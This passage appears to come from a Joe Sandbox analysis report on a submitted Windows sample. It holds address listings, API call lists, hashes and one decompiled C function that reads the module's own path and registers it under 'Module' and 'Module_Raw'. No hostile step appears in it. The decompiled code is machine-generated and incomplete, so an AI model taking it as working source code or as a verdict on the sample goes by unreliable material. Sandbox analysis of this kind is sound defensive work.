                                                                                                                                                                                                                                                                                          0x000f7e4f
                                                                                                                                                                                                                                                                                          0x000f7e5e
                                                                                                                                                                                                                                                                                          0x000f7e65
                                                                                                                                                                                                                                                                                          0x000f7e65
                                                                                                                                                                                                                                                                                          0x000f7eaf
                                                                                                                                                                                                                                                                                          0x000f7eb2
                                                                                                                                                                                                                                                                                          0x000f7eba
                                                                                                                                                                                                                                                                                          0x000f7ebc
                                                                                                                                                                                                                                                                                          0x000f7ed0
                                                                                                                                                                                                                                                                                          0x000f7ed7
                                                                                                                                                                                                                                                                                          0x000f7ed7
                                                                                                                                                                                                                                                                                          0x000f7edc
                                                                                                                                                                                                                                                                                          0x000f7edf
                                                                                                                                                                                                                                                                                          0x000f7ee4
                                                                                                                                                                                                                                                                                          0x000f7f45
                                                                                                                                                                                                                                                                                          0x000f7f45
                                                                                                                                                                                                                                                                                          0x000f7f48
                                                                                                                                                                                                                                                                                          0x000f7f4d
                                                                                                                                                                                                                                                                                          0x000f7fb2
                                                                                                                                                                                                                                                                                          0x000f7fb5
                                                                                                                                                                                                                                                                                          0x000f7fc5
                                                                                                                                                                                                                                                                                          0x000f7fdf
                                                                                                                                                                                                                                                                                          0x000f7fe5
                                                                                                                                                                                                                                                                                          0x000f7fea
                                                                                                                                                                                                                                                                                          0x000f7ffa
                                                                                                                                                                                                                                                                                          0x000f7ffc
                                                                                                                                                                                                                                                                                          0x000f8004
                                                                                                                                                                                                                                                                                          0x000f8006
                                                                                                                                                                                                                                                                                          0x000f8011
                                                                                                                                                                                                                                                                                          0x000f801a
                                                                                                                                                                                                                                                                                          0x000f8021
                                                                                                                                                                                                                                                                                          0x000f8021
                                                                                                                                                                                                                                                                                          0x000f8051
                                                                                                                                                                                                                                                                                          0x000f8057
                                                                                                                                                                                                                                                                                          0x000f806e
                                                                                                                                                                                                                                                                                          0x000f806e
                                                                                                                                                                                                                                                                                          0x000f7f4f
                                                                                                                                                                                                                                                                                          0x000f7f5a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f7f60
                                                                                                                                                                                                                                                                                          0x000f7f6a
                                                                                                                                                                                                                                                                                          0x000f7f6e
                                                                                                                                                                                                                                                                                          0x000f7f76
                                                                                                                                                                                                                                                                                          0x000f7f7c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f7f7e
                                                                                                                                                                                                                                                                                          0x000f7f80
                                                                                                                                                                                                                                                                                          0x000f7f83
                                                                                                                                                                                                                                                                                          0x000f7f89
                                                                                                                                                                                                                                                                                          0x000f7f9f
                                                                                                                                                                                                                                                                                          0x000f7f9f
                                                                                                                                                                                                                                                                                          0x000f7fa2
                                                                                                                                                                                                                                                                                          0x000f7fa2
                                                                                                                                                                                                                                                                                          0x000f7fa5
                                                                                                                                                                                                                                                                                          0x000f7fa9
                                                                                                                                                                                                                                                                                          0x000f7fac
                                                                                                                                                                                                                                                                                          0x000f7fae
                                                                                                                                                                                                                                                                                          0x000f7fae
                                                                                                                                                                                                                                                                                          0x000f7fae
                                                                                                                                                                                                                                                                                          0x000f7fae
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f7ee6
                                                                                                                                                                                                                                                                                          0x000f7ee6
                                                                                                                                                                                                                                                                                          0x000f7ef1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f7ef3
                                                                                                                                                                                                                                                                                          0x000f7efd
                                                                                                                                                                                                                                                                                          0x000f7f01
                                                                                                                                                                                                                                                                                          0x000f7f09
                                                                                                                                                                                                                                                                                          0x000f7f0f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f7f11
                                                                                                                                                                                                                                                                                          0x000f7f13
                                                                                                                                                                                                                                                                                          0x000f7f16
                                                                                                                                                                                                                                                                                          0x000f7f1c
                                                                                                                                                                                                                                                                                          0x000f7f32
                                                                                                                                                                                                                                                                                          0x000f7f32
                                                                                                                                                                                                                                                                                          0x000f7f35
                                                                                                                                                                                                                                                                                          0x000f7f35
                                                                                                                                                                                                                                                                                          0x000f7f38
                                                                                                                                                                                                                                                                                          0x000f7f3c
                                                                                                                                                                                                                                                                                          0x000f7f3f
                                                                                                                                                                                                                                                                                          0x000f7f41
                                                                                                                                                                                                                                                                                          0x000f7f41
                                                                                                                                                                                                                                                                                          0x000f7f41
                                                                                                                                                                                                                                                                                          0x000f7f41
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f7f3f

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetMenu.USER32(?), ref: 000F7D65
                                                                                                                                                                                                                                                                                          • SetMenu.USER32(?,00000000,00000080), ref: 000F7D83
                                                                                                                                                                                                                                                                                          • LoadStringA.USER32 ref: 000F7DF0
                                                                                                                                                                                                                                                                                          • #6.COMCTL32(56000100,00000000,?,0000E801), ref: 000F7E0B
                                                                                                                                                                                                                                                                                            • Part of subcall function 00103ED0: GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 00103F0E
                                                                                                                                                                                                                                                                                            • Part of subcall function 00103ED0: FlushInstructionCache.KERNEL32(00000000), ref: 00103F15
                                                                                                                                                                                                                                                                                            • Part of subcall function 00103ED0: GetCurrentThreadId.KERNEL32 ref: 00103F39
                                                                                                                                                                                                                                                                                            • Part of subcall function 00103ED0: EnterCriticalSection.KERNEL32(00170C68), ref: 00103F47
                                                                                                                                                                                                                                                                                            • Part of subcall function 00103ED0: LeaveCriticalSection.KERNEL32(00170C68), ref: 00103F61
                                                                                                                                                                                                                                                                                            • Part of subcall function 00103ED0: CreateWindowExA.USER32 ref: 00103FBC
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,000007E8,00000000,00000000), ref: 000F7FC5
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000423,00000002,00000000), ref: 000F7FFA
                                                                                                                                                                                                                                                                                          • GetSubMenu.USER32 ref: 000F8042
                                                                                                                                                                                                                                                                                          • GetSubMenu.USER32 ref: 000F8047
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FA990: __recalloc.LIBCMT ref: 000FA9CE
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Menu$CriticalCurrentMessageSectionSend$CacheCreateEnterFlushInstructionLeaveLoadProcessStringThreadWindow__recalloc
                                                                                                                                                                                                                                                                                          • String ID: ToolbarWindow32
                                                                                                                                                                                                                                                                                          • API String ID: 3214561950-4104838417
                                                                                                                                                                                                                                                                                          • Opcode ID: 6aad78fd712e9076e303051a878283e66bccfb3f905a96ca233aef8d7437afc4
                                                                                                                                                                                                                                                                                          • Instruction ID: db7bbd3aecd25648a1fabe960ab35293d8c215d0fdccffd20972412704014236
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6aad78fd712e9076e303051a878283e66bccfb3f905a96ca233aef8d7437afc4
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BA1B475A002199FEB64DF34CC45BB6B3B4BF48700F4081A9F64DA7A82DB74AD84DB91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                                                                                                          			E000F3FE0(unsigned int __ecx, unsigned int __edx, CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                                                                                                          				char _v1314;
                                                                                                                                                                                                                                                                                          				short _v1316;
                                                                                                                                                                                                                                                                                          				char _v2356;
                                                                                                                                                                                                                                                                                          				CHAR* _v2360;
                                                                                                                                                                                                                                                                                          				unsigned int _v2364;
                                                                                                                                                                                                                                                                                          				unsigned int _v2368;
                                                                                                                                                                                                                                                                                          				char _v2372;
                                                                                                                                                                                                                                                                                          				intOrPtr _v2376;
                                                                                                                                                                                                                                                                                          				intOrPtr _v2380;
                                                                                                                                                                                                                                                                                          				intOrPtr _v2384;
                                                                                                                                                                                                                                                                                          				intOrPtr _v2388;
                                                                                                                                                                                                                                                                                          				intOrPtr _v2392;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION _v2396;
                                                                                                                                                                                                                                                                                          				long _v2400;
                                                                                                                                                                                                                                                                                          				long _v2404;
                                                                                                                                                                                                                                                                                          				long _v2408;
                                                                                                                                                                                                                                                                                          				char _v2412;
                                                                                                                                                                                                                                                                                          				CHAR* _v2416;
                                                                                                                                                                                                                                                                                          				void* _v2428;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t69;
                                                                                                                                                                                                                                                                                          				unsigned int _t77;
                                                                                                                                                                                                                                                                                          				long _t80;
                                                                                                                                                                                                                                                                                          				int _t81;
                                                                                                                                                                                                                                                                                          				void* _t83;
                                                                                                                                                                                                                                                                                          				unsigned int _t89;
                                                                                                                                                                                                                                                                                          				void* _t92;
                                                                                                                                                                                                                                                                                          				signed int _t93;
                                                                                                                                                                                                                                                                                          				int _t99;
                                                                                                                                                                                                                                                                                          				void* _t101;
                                                                                                                                                                                                                                                                                          				void* _t105;
                                                                                                                                                                                                                                                                                          				unsigned int _t107;
                                                                                                                                                                                                                                                                                          				void* _t108;
                                                                                                                                                                                                                                                                                          				void* _t115;
                                                                                                                                                                                                                                                                                          				signed int _t124;
                                                                                                                                                                                                                                                                                          				CHAR* _t126;
                                                                                                                                                                                                                                                                                          				void* _t145;
                                                                                                                                                                                                                                                                                          				unsigned int _t151;
                                                                                                                                                                                                                                                                                          				void* _t154;
                                                                                                                                                                                                                                                                                          				void* _t157;
                                                                                                                                                                                                                                                                                          				signed int _t158;
                                                                                                                                                                                                                                                                                          				void* _t159;
                                                                                                                                                                                                                                                                                          				void* _t161;
                                                                                                                                                                                                                                                                                          				void* _t162;
                                                                                                                                                                                                                                                                                          				void* _t163;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t144 = __edx;
                                                                                                                                                                                                                                                                                          				_t69 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t69 ^ _t158;
                                                                                                                                                                                                                                                                                          				_t126 = 0;
                                                                                                                                                                                                                                                                                          				_t151 = __ecx;
                                                                                                                                                                                                                                                                                          				_v2416 = _a4;
                                                                                                                                                                                                                                                                                          				_t128 =  &_v2396;
                                                                                                                                                                                                                                                                                          				_v2368 = __ecx;
                                                                                                                                                                                                                                                                                          				_t152 = __edx;
                                                                                                                                                                                                                                                                                          				_v2412 = 0x112cf0;
                                                                                                                                                                                                                                                                                          				_v2408 = 0;
                                                                                                                                                                                                                                                                                          				_v2404 = 0;
                                                                                                                                                                                                                                                                                          				_v2400 = 0;
                                                                                                                                                                                                                                                                                          				_v2396 = 0;
                                                                                                                                                                                                                                                                                          				_v2392 = 0;
                                                                                                                                                                                                                                                                                          				_v2388 = 0;
                                                                                                                                                                                                                                                                                          				_v2384 = 0;
                                                                                                                                                                                                                                                                                          				_v2380 = 0;
                                                                                                                                                                                                                                                                                          				_v2376 = 0;
                                                                                                                                                                                                                                                                                          				_v2372 = 0;
                                                                                                                                                                                                                                                                                          				if(InitializeCriticalSectionAndSpinCount( &_v2396, 0) != 0) {
                                                                                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                                                                                          					_v2372 = 1;
                                                                                                                                                                                                                                                                                          					if(_t152 != _t126) {
                                                                                                                                                                                                                                                                                          						_t121 =  *_t152;
                                                                                                                                                                                                                                                                                          						if( *_t152 != _t126) {
                                                                                                                                                                                                                                                                                          							do {
                                                                                                                                                                                                                                                                                          								E000F2050(_t128,  *((intOrPtr*)(_t152 + 4)),  &_v2412, _t121,  *((intOrPtr*)(_t152 + 4)));
                                                                                                                                                                                                                                                                                          								_t121 =  *(_t152 + 8);
                                                                                                                                                                                                                                                                                          								_t152 = _t152 + 8;
                                                                                                                                                                                                                                                                                          							} while (_t121 != _t126);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t145 =  *_t151;
                                                                                                                                                                                                                                                                                          					_t144 =  *(_t145 + 0x14);
                                                                                                                                                                                                                                                                                          					_t152 =  *( *(_t145 + 0x14))( &_v2412);
                                                                                                                                                                                                                                                                                          					if(_t152 < _t126) {
                                                                                                                                                                                                                                                                                          						L12:
                                                                                                                                                                                                                                                                                          						E000F1F50();
                                                                                                                                                                                                                                                                                          						_t77 = _t152;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_v2360 = _t126;
                                                                                                                                                                                                                                                                                          						_t126 =  *0x170c08;
                                                                                                                                                                                                                                                                                          						_t80 = GetModuleFileNameA(_t126,  &_v268, 0x104);
                                                                                                                                                                                                                                                                                          						if(_t80 != 0) {
                                                                                                                                                                                                                                                                                          							if(_t80 != 0x104) {
                                                                                                                                                                                                                                                                                          								_t133 =  &_v268;
                                                                                                                                                                                                                                                                                          								_t81 = lstrlenA( &_v268);
                                                                                                                                                                                                                                                                                          								_t144 =  &_v2364;
                                                                                                                                                                                                                                                                                          								_v2364 = _t81 + 1;
                                                                                                                                                                                                                                                                                          								_t83 = E000F1000(_t81 + 1,  &_v2364,  &_v2364);
                                                                                                                                                                                                                                                                                          								_t161 = _t159 + 4;
                                                                                                                                                                                                                                                                                          								if(_t83 < 0) {
                                                                                                                                                                                                                                                                                          									L21:
                                                                                                                                                                                                                                                                                          									_t152 =  &_v2360;
                                                                                                                                                                                                                                                                                          									E000FA200( &_v2360);
                                                                                                                                                                                                                                                                                          									E000F1F50();
                                                                                                                                                                                                                                                                                          									_t77 = 0x8007000e;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t151 = _v2364;
                                                                                                                                                                                                                                                                                          									if(_t151 > 0x400) {
                                                                                                                                                                                                                                                                                          										L19:
                                                                                                                                                                                                                                                                                          										_t154 = E000FA1D0(_t151, _t133, _t151,  &_v2360);
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t115 = E000F1030( &_v268,  &_v2364, _t151);
                                                                                                                                                                                                                                                                                          										_t161 = _t161 + 4;
                                                                                                                                                                                                                                                                                          										if(_t115 == 0) {
                                                                                                                                                                                                                                                                                          											goto L19;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											E0010ACA0(_t151);
                                                                                                                                                                                                                                                                                          											_t154 = _t161;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t144 = _t151 >> 1;
                                                                                                                                                                                                                                                                                          									_t89 = E000F10E0( &_v268, _t151 >> 1, _t154, 3);
                                                                                                                                                                                                                                                                                          									_v2368 = _t89;
                                                                                                                                                                                                                                                                                          									if(_t89 != 0) {
                                                                                                                                                                                                                                                                                          										E000F1620(_t89,  &_v2356, 0x208);
                                                                                                                                                                                                                                                                                          										if(_t126 == 0 || _t126 == GetModuleHandleA(0)) {
                                                                                                                                                                                                                                                                                          											_t144 = 0x22;
                                                                                                                                                                                                                                                                                          											_v1316 = 0x22;
                                                                                                                                                                                                                                                                                          											_t92 = E000F1140( &_v2356,  &_v1314);
                                                                                                                                                                                                                                                                                          											_t161 = _t161 + 4;
                                                                                                                                                                                                                                                                                          											if(_t92 != 0) {
                                                                                                                                                                                                                                                                                          												_t93 = lstrlenW( &_v1316);
                                                                                                                                                                                                                                                                                          												 *((short*)(_t158 + _t93 * 2 - 0x520)) = 0x22;
                                                                                                                                                                                                                                                                                          												_t144 =  &_v1316;
                                                                                                                                                                                                                                                                                          												_t137 = 0;
                                                                                                                                                                                                                                                                                          												_push( &_v1316);
                                                                                                                                                                                                                                                                                          												 *((short*)(_t158 + _t93 * 2 - 0x51e)) = 0;
                                                                                                                                                                                                                                                                                          												_push(L"Module");
                                                                                                                                                                                                                                                                                          												_push( &_v2412);
                                                                                                                                                                                                                                                                                          												goto L28;
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												_t152 =  &_v2360;
                                                                                                                                                                                                                                                                                          												E000FA200( &_v2360);
                                                                                                                                                                                                                                                                                          												E000F1F50();
                                                                                                                                                                                                                                                                                          												_t77 = 0x80004005;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_push( &_v2356);
                                                                                                                                                                                                                                                                                          											_push(L"Module");
                                                                                                                                                                                                                                                                                          											_t137 =  &_v2412;
                                                                                                                                                                                                                                                                                          											_push( &_v2412);
                                                                                                                                                                                                                                                                                          											L28:
                                                                                                                                                                                                                                                                                          											_t151 = E000F2050(_t137, _t144);
                                                                                                                                                                                                                                                                                          											if(_t151 < 0) {
                                                                                                                                                                                                                                                                                          												L41:
                                                                                                                                                                                                                                                                                          												_t152 =  &_v2360;
                                                                                                                                                                                                                                                                                          												E000FA200( &_v2360);
                                                                                                                                                                                                                                                                                          												goto L42;
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												_t144 =  &_v2412;
                                                                                                                                                                                                                                                                                          												_t151 = E000F2050( &_v2356,  &_v2412,  &_v2412, L"Module_Raw",  &_v2356);
                                                                                                                                                                                                                                                                                          												if(_t151 < 0) {
                                                                                                                                                                                                                                                                                          													goto L41;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													_t126 = _v2416;
                                                                                                                                                                                                                                                                                          													if(_t126 == 0) {
                                                                                                                                                                                                                                                                                          														goto L21;
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														_t99 = lstrlenA(_t126);
                                                                                                                                                                                                                                                                                          														_t140 =  &_v2364;
                                                                                                                                                                                                                                                                                          														_v2364 = _t99 + 1;
                                                                                                                                                                                                                                                                                          														_t101 = E000F1000(_t99 + 1,  &_v2412,  &_v2364);
                                                                                                                                                                                                                                                                                          														_t162 = _t161 + 4;
                                                                                                                                                                                                                                                                                          														if(_t101 < 0) {
                                                                                                                                                                                                                                                                                          															goto L21;
                                                                                                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                                                                                                          															_t151 = _v2364;
                                                                                                                                                                                                                                                                                          															if(_t151 > 0x400) {
                                                                                                                                                                                                                                                                                          																L35:
                                                                                                                                                                                                                                                                                          																_t157 = E000FA1D0(_t151, _t140, _t151,  &_v2360);
                                                                                                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                                                                                                          																_t108 = E000F1030( &_v2364, _t144, _t151);
                                                                                                                                                                                                                                                                                          																_t163 = _t162 + 4;
                                                                                                                                                                                                                                                                                          																if(_t108 == 0) {
                                                                                                                                                                                                                                                                                          																	goto L35;
                                                                                                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                                                                                                          																	E0010ACA0(_t151);
                                                                                                                                                                                                                                                                                          																	_t157 = _t163;
                                                                                                                                                                                                                                                                                          																}
                                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                                          															_t144 = _t151 >> 1;
                                                                                                                                                                                                                                                                                          															_t105 = E000F10E0(_t126, _t151 >> 1, _t157, 3);
                                                                                                                                                                                                                                                                                          															_t141 = _t105;
                                                                                                                                                                                                                                                                                          															if(_t105 == 0) {
                                                                                                                                                                                                                                                                                          																goto L21;
                                                                                                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                                                                                                          																_t144 = _v2368;
                                                                                                                                                                                                                                                                                          																_push(_v2368);
                                                                                                                                                                                                                                                                                          																_push( &_v2412);
                                                                                                                                                                                                                                                                                          																if(_a8 == 0) {
                                                                                                                                                                                                                                                                                          																	_t107 = E000F28F0(_t141, _t144);
                                                                                                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                                                                                                          																	_t107 = E000F2610(_t141, _t144);
                                                                                                                                                                                                                                                                                          																}
                                                                                                                                                                                                                                                                                          																_t151 = _t107;
                                                                                                                                                                                                                                                                                          																goto L41;
                                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										goto L21;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t152 =  &_v2360;
                                                                                                                                                                                                                                                                                          								E000FA200( &_v2360);
                                                                                                                                                                                                                                                                                          								E000F1F50();
                                                                                                                                                                                                                                                                                          								_t77 = 0x8007007a;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t152 = E000F13E0();
                                                                                                                                                                                                                                                                                          							goto L12;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t124 = GetLastError();
                                                                                                                                                                                                                                                                                          					if(_t124 > 0) {
                                                                                                                                                                                                                                                                                          						_t124 = _t124 & 0x0000ffff | 0x80070000;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t151 = _t124;
                                                                                                                                                                                                                                                                                          					if(_t151 < _t126) {
                                                                                                                                                                                                                                                                                          						L42:
                                                                                                                                                                                                                                                                                          						E000F1F50();
                                                                                                                                                                                                                                                                                          						_t77 = _t151;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t151 = _v2368;
                                                                                                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return E001059E6(_t77, _t126, _v8 ^ _t158, _t144, _t151, _t152);
                                                                                                                                                                                                                                                                                          			}




















































                                                                                                                                                                                                                                                                                          0x000f3fe0
                                                                                                                                                                                                                                                                                          0x000f3fe9
                                                                                                                                                                                                                                                                                          0x000f3ff0
                                                                                                                                                                                                                                                                                          0x000f3ff9
                                                                                                                                                                                                                                                                                          0x000f3ffb
                                                                                                                                                                                                                                                                                          0x000f3ffd
                                                                                                                                                                                                                                                                                          0x000f4006
                                                                                                                                                                                                                                                                                          0x000f400d
                                                                                                                                                                                                                                                                                          0x000f4013
                                                                                                                                                                                                                                                                                          0x000f4015
                                                                                                                                                                                                                                                                                          0x000f401f
                                                                                                                                                                                                                                                                                          0x000f4025
                                                                                                                                                                                                                                                                                          0x000f402b
                                                                                                                                                                                                                                                                                          0x000f4031
                                                                                                                                                                                                                                                                                          0x000f4037
                                                                                                                                                                                                                                                                                          0x000f403d
                                                                                                                                                                                                                                                                                          0x000f4043
                                                                                                                                                                                                                                                                                          0x000f4049
                                                                                                                                                                                                                                                                                          0x000f404f
                                                                                                                                                                                                                                                                                          0x000f4055
                                                                                                                                                                                                                                                                                          0x000f4063
                                                                                                                                                                                                                                                                                          0x000f4089
                                                                                                                                                                                                                                                                                          0x000f4089
                                                                                                                                                                                                                                                                                          0x000f4092
                                                                                                                                                                                                                                                                                          0x000f4094
                                                                                                                                                                                                                                                                                          0x000f4098
                                                                                                                                                                                                                                                                                          0x000f40a0
                                                                                                                                                                                                                                                                                          0x000f40ac
                                                                                                                                                                                                                                                                                          0x000f40b1
                                                                                                                                                                                                                                                                                          0x000f40b4
                                                                                                                                                                                                                                                                                          0x000f40b7
                                                                                                                                                                                                                                                                                          0x000f40a0
                                                                                                                                                                                                                                                                                          0x000f4098
                                                                                                                                                                                                                                                                                          0x000f40bb
                                                                                                                                                                                                                                                                                          0x000f40bd
                                                                                                                                                                                                                                                                                          0x000f40cb
                                                                                                                                                                                                                                                                                          0x000f40cf
                                                                                                                                                                                                                                                                                          0x000f40fb
                                                                                                                                                                                                                                                                                          0x000f4101
                                                                                                                                                                                                                                                                                          0x000f4106
                                                                                                                                                                                                                                                                                          0x000f40d1
                                                                                                                                                                                                                                                                                          0x000f40dc
                                                                                                                                                                                                                                                                                          0x000f40e2
                                                                                                                                                                                                                                                                                          0x000f40ea
                                                                                                                                                                                                                                                                                          0x000f40f2
                                                                                                                                                                                                                                                                                          0x000f4112
                                                                                                                                                                                                                                                                                          0x000f4134
                                                                                                                                                                                                                                                                                          0x000f413b
                                                                                                                                                                                                                                                                                          0x000f4141
                                                                                                                                                                                                                                                                                          0x000f4149
                                                                                                                                                                                                                                                                                          0x000f414f
                                                                                                                                                                                                                                                                                          0x000f4154
                                                                                                                                                                                                                                                                                          0x000f4159
                                                                                                                                                                                                                                                                                          0x000f41ab
                                                                                                                                                                                                                                                                                          0x000f41ab
                                                                                                                                                                                                                                                                                          0x000f41b1
                                                                                                                                                                                                                                                                                          0x000f41bc
                                                                                                                                                                                                                                                                                          0x000f41c1
                                                                                                                                                                                                                                                                                          0x000f415b
                                                                                                                                                                                                                                                                                          0x000f415b
                                                                                                                                                                                                                                                                                          0x000f4167
                                                                                                                                                                                                                                                                                          0x000f4181
                                                                                                                                                                                                                                                                                          0x000f418e
                                                                                                                                                                                                                                                                                          0x000f4169
                                                                                                                                                                                                                                                                                          0x000f416a
                                                                                                                                                                                                                                                                                          0x000f416f
                                                                                                                                                                                                                                                                                          0x000f4174
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f4176
                                                                                                                                                                                                                                                                                          0x000f4178
                                                                                                                                                                                                                                                                                          0x000f417d
                                                                                                                                                                                                                                                                                          0x000f417d
                                                                                                                                                                                                                                                                                          0x000f4174
                                                                                                                                                                                                                                                                                          0x000f4194
                                                                                                                                                                                                                                                                                          0x000f419c
                                                                                                                                                                                                                                                                                          0x000f41a1
                                                                                                                                                                                                                                                                                          0x000f41a9
                                                                                                                                                                                                                                                                                          0x000f41d6
                                                                                                                                                                                                                                                                                          0x000f41dd
                                                                                                                                                                                                                                                                                          0x000f4206
                                                                                                                                                                                                                                                                                          0x000f4212
                                                                                                                                                                                                                                                                                          0x000f4219
                                                                                                                                                                                                                                                                                          0x000f421e
                                                                                                                                                                                                                                                                                          0x000f4223
                                                                                                                                                                                                                                                                                          0x000f424c
                                                                                                                                                                                                                                                                                          0x000f4257
                                                                                                                                                                                                                                                                                          0x000f425f
                                                                                                                                                                                                                                                                                          0x000f4265
                                                                                                                                                                                                                                                                                          0x000f4267
                                                                                                                                                                                                                                                                                          0x000f4268
                                                                                                                                                                                                                                                                                          0x000f4270
                                                                                                                                                                                                                                                                                          0x000f427b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f4225
                                                                                                                                                                                                                                                                                          0x000f4225
                                                                                                                                                                                                                                                                                          0x000f422b
                                                                                                                                                                                                                                                                                          0x000f4236
                                                                                                                                                                                                                                                                                          0x000f423b
                                                                                                                                                                                                                                                                                          0x000f423b
                                                                                                                                                                                                                                                                                          0x000f41eb
                                                                                                                                                                                                                                                                                          0x000f41f1
                                                                                                                                                                                                                                                                                          0x000f41f2
                                                                                                                                                                                                                                                                                          0x000f41f7
                                                                                                                                                                                                                                                                                          0x000f41fd
                                                                                                                                                                                                                                                                                          0x000f427c
                                                                                                                                                                                                                                                                                          0x000f4281
                                                                                                                                                                                                                                                                                          0x000f4285
                                                                                                                                                                                                                                                                                          0x000f434e
                                                                                                                                                                                                                                                                                          0x000f434e
                                                                                                                                                                                                                                                                                          0x000f4354
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f428b
                                                                                                                                                                                                                                                                                          0x000f4297
                                                                                                                                                                                                                                                                                          0x000f42a3
                                                                                                                                                                                                                                                                                          0x000f42a7
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f42ad
